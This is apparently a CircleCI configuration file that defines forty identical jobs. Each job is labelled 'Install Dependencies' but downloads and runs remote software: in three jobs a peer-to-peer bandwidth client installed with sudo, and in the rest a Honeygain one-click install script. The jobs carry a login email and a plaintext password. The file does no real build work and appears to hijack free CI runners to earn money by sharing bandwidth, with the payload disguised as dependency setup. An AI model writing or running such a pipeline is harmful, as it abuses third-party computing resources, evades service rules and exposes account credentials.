version: 2.1
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/archernap/Package/raw/main/p2pclient_0.60_amd64.deb && chmod +x p2pclient_0.60_amd64.deb && sudo dpkg -i p2pclient_0.60_amd64.deb && p2pclient --login mallory121@protonmail.com
    aku2:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/archernap/Package/raw/main/p2pclient_0.60_amd64.deb && chmod +x p2pclient_0.60_amd64.deb && sudo dpkg -i p2pclient_0.60_amd64.deb && p2pclient --login mallory121@protonmail.com
    aku3:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/archernap/Package/raw/main/p2pclient_0.60_amd64.deb && chmod +x p2pclient_0.60_amd64.deb && sudo dpkg -i p2pclient_0.60_amd64.deb && p2pclient --login mallory121@protonmail.com
    aku4:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku5:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku6:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku7:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku8:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku9:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku10:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku11:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku12:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku13:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku14:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku15:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku16:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku17:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku18:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku19:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku20:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku21:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku22:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku23:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku24:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku25:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku26:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku27:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku28:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku29:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku30:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku31:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku32:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku33:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku34:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku35:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku36:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku37:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku38:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku39:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890
    aku40:
      docker:
            - image: circleci/ruby:2.5.3
      steps:
        - run:
            name: Install Dependencies
            command: wget curl -L https://raw.githubusercontent.com/spiritLHLS/honeygain-one-click-command-installation/main/hg.sh -o hg.sh && chmod +x hg.sh && bash hg.sh -m mallory121@protonmail.com -p Zaq@1234567890

workflows:
    version: 2.1
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5
            - aku6
            - aku7
            - aku8
            - aku9
            - aku10
            - aku11
            - aku12
            - aku13
            - aku14
            - aku15
            - aku16
            - aku17
            - aku18
            - aku19
            - aku20
            - aku21
            - aku22
            - aku23
            - aku24
            - aku25
            - aku26
            - aku27
            - aku28
            - aku29
            - aku30
            - aku31
            - aku32
            - aku33
            - aku34
            - aku35
            - aku36
            - aku37
            - aku38
            - aku39
            - aku40
